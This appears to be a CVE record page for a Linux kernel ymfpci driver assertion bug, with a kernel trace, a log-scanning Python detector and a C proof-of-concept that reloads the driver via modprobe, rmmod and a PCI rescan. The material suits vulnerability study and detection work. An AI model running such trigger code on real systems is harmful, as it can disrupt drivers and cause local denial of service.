Security Vulnerability Report
CVE-2023-53607 CVSS 5.5 MEDIUM

CVE-2023-53607

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:26:46
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ALSA: ymfpci: Fix BUG_ON in probe function

The snd_dma_buffer.bytes field now contains the aligned size, which this snd_BUG_ON() did not account for, resulting in the following:

[ 9.625915] ------------[ cut here ]------------
[ 9.633440] WARNING: CPU: 0 PID: 126 at sound/pci/ymfpci/ymfpci_main.c:2168 snd_ymfpci_create+0x681/0x698 [snd_ymfpci]
[ 9.648926] Modules linked in: snd_ymfpci(+) snd_intel_dspcfg kvm(+) snd_intel_sdw_acpi snd_ac97_codec snd_mpu401_uart snd_opl3_lib irqbypass snd_hda_codec gameport snd_rawmidi crct10dif_pclmul crc32_pclmul cfg80211 snd_hda_core polyval_clmulni polyval_generic gf128mul snd_seq_device ghash_clmulni_intel snd_hwdep ac97_bus sha512_ssse3 rfkill snd_pcm aesni_intel tg3 snd_timer crypto_simd snd mxm_wmi libphy cryptd k10temp fam15h_power pcspkr soundcore sp5100_tco wmi acpi_cpufreq mac_hid dm_multipath sg loop fuse dm_mod bpf_preload ip_tables x_tables ext4 crc32c_generic crc16 mbcache jbd2 sr_mod cdrom ata_generic pata_acpi firewire_ohci crc32c_intel firewire_core xhci_pci crc_itu_t pata_via xhci_pci_renesas floppy
[ 9.711849] CPU: 0 PID: 126 Comm: kworker/0:2 Not tainted 6.1.21-1-lts #1 08d2e5ece03136efa7c6aeea9a9c40916b1bd8da
[ 9.722200] Hardware name: To Be Filled By O.E.M. To Be Filled By O.E.M./990FX Extreme4, BIOS P2.70 06/05/2014
[ 9.732204] Workqueue: events work_for_cpu_fn
[ 9.736580] RIP: 0010:snd_ymfpci_create+0x681/0x698 [snd_ymfpci]
[ 9.742594] Code: 8c c0 4c 89 e2 48 89 df 48 c7 c6 92 c6 8c c0 e8 15 d0 e9 ff 48 83 c4 08 44 89 e8 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d3 7a 33 e3 <0f> 0b e9 cb fd ff ff 41 bd fb ff ff ff eb db 41 bd f4 ff ff ff eb
[ 9.761358] RSP: 0018:ffffab64804e7da0 EFLAGS: 00010287
[ 9.766594] RAX: ffff8fa2df06c400 RBX: ffff8fa3073a8000 RCX: ffff8fa303fbc4a8
[ 9.773734] RDX: ffff8fa2df06d000 RSI: 0000000000000010 RDI: 0000000000000020
[ 9.780876] RBP: ffff8fa300b5d0d0 R08: ffff8fa3073a8e50 R09: 00000000df06bf00
[ 9.788018] R10: ffff8fa2df06bf00 R11: 00000000df068200 R12: ffff8fa3073a8918
[ 9.795159] R13: 0000000000000000 R14: 0000000000000080 R15: ffff8fa2df068200
[ 9.802317] FS: 0000000000000000(0000) GS:ffff8fa9fec00000(0000) knlGS:0000000000000000
[ 9.810414] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9.816158] CR2: 000055febaf66500 CR3: 0000000101a2e000 CR4: 00000000000406f0
[ 9.823301] Call Trace:
[ 9.825747] <TASK>
[ 9.827889] snd_card_ymfpci_probe+0x194/0x950 [snd_ymfpci b78a5fe64b5663a6390a909c67808567e3e73615]
[ 9.837030] ? finish_task_switch.isra.0+0x90/0x2d0
[ 9.841918] local_pci_probe+0x45/0x80
[ 9.845680] work_for_cpu_fn+0x1a/0x30
[ 9.849431] process_one_work+0x1c7/0x380
[ 9.853464] worker_thread+0x1af/0x390
[ 9.857225] ? rescuer_thread+0x3b0/0x3b0
[ 9.861254] kthread+0xde/0x110
[ 9.864414] ? kthread_complete_and_exit+0x20/0x20
[ 9.869210] ret_from_fork+0x22/0x30
[ 9.872792] </TASK>
[ 9.874985] ---[ end trace 0000000000000000 ]---
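
Detection example (added here; not part of the CVE record or the kernel patch): the scanner below looks through kernel log text for the WARNING raised in snd_ymfpci_create and reports the kernel release string from the same trace. The function name, the regular expressions and the sample log (constructed in the shape of the trace above, plus one unrelated warning) are assumptions made for the example.

```python
import re

# Constructed sample: lines shaped like the trace in the description,
# followed by an unrelated, made-up warning that must not match.
SAMPLE_LOG = """\
[ 9.625915] ------------[ cut here ]------------
[ 9.633440] WARNING: CPU: 0 PID: 126 at sound/pci/ymfpci/ymfpci_main.c:2168 snd_ymfpci_create+0x681/0x698 [snd_ymfpci]
[ 9.711849] CPU: 0 PID: 126 Comm: kworker/0:2 Not tainted 6.1.21-1-lts #1 08d2e5ece03136efa7c6aeea9a9c40916b1bd8da
[ 9.874985] ---[ end trace 0000000000000000 ]---
[ 12.000001] ------------[ cut here ]------------
[ 12.000002] WARNING: CPU: 1 PID: 300 at drivers/example/example.c:42 example_fn+0x1/0x2
[ 12.000003] ---[ end trace 0000000000000000 ]---
"""

WARN_RE = re.compile(
    r"WARNING: CPU: \d+ PID: (?P<pid>\d+) at (?P<file>\S+):(?P<line>\d+) "
    r"(?P<func>[\w.]+)\+0x[0-9a-f]+/0x[0-9a-f]+(?: \[(?P<module>\w+)\])?")
KREL_RE = re.compile(
    r"Comm: \S+ (?:Not tainted|Tainted: .+?) (?P<release>\S+) #\d+")

# Match on source file and function only: the line number (2168 in the
# report) moves between kernel versions.
SIG_FILE = "sound/pci/ymfpci/ymfpci_main.c"
SIG_FUNC = "snd_ymfpci_create"

def find_ymfpci_probe_warnings(log_text):
    """Return one dict per ymfpci probe WARNING found in log_text."""
    hits, current = [], None
    for raw in log_text.splitlines():
        m = WARN_RE.search(raw)
        if m:
            is_sig = m["file"] == SIG_FILE and m["func"] == SIG_FUNC
            current = {**m.groupdict(), "release": None} if is_sig else None
            if current:
                hits.append(current)
            continue
        if current is None:
            continue
        k = KREL_RE.search(raw)
        if k:
            current["release"] = k["release"]   # kernel that logged the trace
        elif "end trace" in raw:
            current = None                       # trace closed
    return hits

if __name__ == "__main__":
    for hit in find_ymfpci_probe_warnings(SAMPLE_LOG):
        print(hit)
```

A hit is still reported when the log is cut off before the "end trace" line; in that case the release field stays None if the "CPU: ... Comm:" line was also lost.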

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

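cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 4.9.325, before 4.10) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 4.14.290, before 4.15) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 4.19.254, before 4.20) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.4.208, before 5.5) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.10.134, end version truncated in the record) - VULNERABLE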
Linux kernel before the fixed release that follows 6.1.21-lts
Linux kernel stable branch (requires applying patch 32b9bd7cfc2e2d92d595386add4e111b232b351f)
Linux kernel stable branch (requires applying patch 6be2e7522eb529b41c16d459f33bbdbcddbf5c15)
Linux kernel stable branch (requires applying patch 81d2a7e93c8322ca6b858f6736d7fc3d034e6c23)
Linux kernel stable branch (requires applying patch 96e34c88000febc83e41aa7db0b0a41676314818)
Linux kernel stable branch (requires applying patch d0217b09910c081b6471181345ea5b24025edf51)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2023-53607 PoC - Trigger BUG_ON in snd_ymfpci probe function
// This PoC demonstrates how to trigger the vulnerability by loading the snd_ymfpci module
// on a system with a Yamaha PCI sound card (YMF724/YMF740/YMF744/YMF754)
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

/*
 * Method 1: Direct module loading
 * Simply loading the snd_ymfpci module will trigger the probe function
 * which contains the buggy snd_BUG_ON() assertion.
 */
int trigger_via_modprobe() {
    printf("Triggering CVE-2023-53607 via modprobe...\n");
    // Load the snd_ymfpci module - this will trigger pci_probe -> snd_card_ymfpci_probe -> snd_ymfpci_create
    int ret = system("modprobe snd-ymfpci 2>&1");
    if (ret != 0) {
        printf("modprobe failed (module may already be loaded or no compatible hardware)\n");
        return -1;
    }
    printf("Module loaded - check dmesg for BUG_ON warning\n");
    return 0;
}

/*
 * Method 2: Trigger via sysfs hotplug (if supported)
 * Some systems allow triggering PCI rescan which will re-probe the device
 */
int trigger_via_rescan() {
    printf("Triggering CVE-2023-53607 via PCI rescan...\n");
    // Write to PCI rescan sysfs entry to trigger re-probing
    int fd = open("/sys/bus/pci/rescan", O_WRONLY);
    if (fd < 0) {
        perror("open /sys/bus/pci/rescan");
        return -1;
    }
    write(fd, "1\n", 2);
    close(fd);
    printf("PCI rescan triggered - check dmesg for warnings\n");
    return 0;
}

/*
 * Method 3: Force module reload
 * If the module is already loaded, remove and reload it
 */
int trigger_via_reload() {
    printf("Attempting module reload...\n");
    system("rmmod snd_ymfpci 2>/dev/null");
    usleep(100000);
    int ret = system("modprobe snd-ymfpci 2>&1");
    if (ret != 0) {
        printf("Reload failed\n");
        return -1;
    }
    printf("Module reloaded - check dmesg for BUG_ON warning\n");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("=== CVE-2023-53607 PoC ===\n");
    printf("Linux Kernel ALSA ymfpci BUG_ON in probe function\n\n");

    /* Check if running as root (required for module operations) */
    if (getuid() != 0) {
        printf("Warning: This PoC requires root privileges for module operations\n");
        printf("Try: sudo %s\n", argv[0]);
    }

    /* Check for compatible hardware */
    int hwcheck = system("lspci | grep -i 'Yamaha' 2>/dev/null");
    if (hwcheck != 0) {
        printf("No Yamaha PCI sound card detected.\n");
        printf("This vulnerability requires YMF724/YMF740/YMF744/YMF754 hardware.\n");
        printf("On systems without this hardware, the module load will fail gracefully.\n\n");
    } else {
        printf("Yamaha PCI sound card detected!\n\n");
    }

    /* Try different trigger methods */
    if (argc > 1 && strcmp(argv[1], "rescan") == 0) {
        trigger_via_rescan();
    } else if (argc > 1 && strcmp(argv[1], "reload") == 0) {
        trigger_via_reload();
    } else {
        trigger_via_modprobe();
    }

    /* "\\|" prints a literal backslash-pipe, the alternation grep expects */
    printf("\nCheck kernel logs with: dmesg | grep -i 'snd_ymfpci\\|BUG_ON'\n");
    return 0;
}

Additional Record Data

Vulnerability Status: Analyzed
Weakness: CWE-617
Exploitability Score: 1.8
Impact Score: 3.6